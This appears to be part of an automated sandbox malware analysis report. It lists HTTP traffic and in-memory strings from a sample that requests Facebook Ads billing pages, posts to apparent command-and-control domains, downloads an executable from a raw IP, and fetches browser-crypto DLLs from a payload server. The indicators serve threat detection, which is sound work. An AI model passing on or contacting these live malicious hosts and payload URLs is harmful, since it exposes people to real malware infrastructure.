Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmxjpgcre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxhagj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idkcje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxwvikrtgo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://usbhmmnst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqnoakwgow.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scuexnvs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmafbpv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: potunulit.org
Source: global traffic HTTP traffic detected: GET /llpb1133.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.73.134.27
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjgurrg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxysrc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vrtsdpwuux.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://saeqmrs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://auuuhpc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpniggi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxqslbplw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fixgfsjkdd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mhfgwrr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: potunulit.org
Source: global traffic HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Host: iueg.aappatey.com
Source: global traffic HTTP traffic detected: POST /check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f6 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Content-Length: 256Host: siaoheg.aappatey.com
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esvui.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: perficut.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xacanotyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: perficut.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://coaqka.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: perficut.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GPRS-ASZAINKW GPRS-ASZAINKW
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 37.34.248.24 37.34.248.24
Source: Joe Sandbox View IP Address: 37.34.248.24 37.34.248.24
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 10
Source: D8D3.exe, 00000013.00000003.518125370.0000000000885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/
Source: D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604
Source: D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e6044
Source: D8D3.exe, 00000013.00000003.514324898.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604n
Source: D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604o
Source: D8D3.exe, 00000013.00000003.441885976.000000000085F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/_
Source: D8D3.exe, 00000013.00000003.462319085.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.453594374.0000000000885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
Source: D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dll
Source: D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dllv
Source: D8D3.exe, 00000013.00000003.462319085.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.0000000000867000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dllp
Source: D8D3.exe, 00000013.00000003.462319085.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462584046.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462433139.0000000000885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
Source: D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.453594374.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
Source: D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlll
Source: D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
Source: D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.444370287.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll6
Source: D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518286829.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.477423109.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464671299.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464693455.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518643936.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517738146.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462584046.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.518917769.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.519064474.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
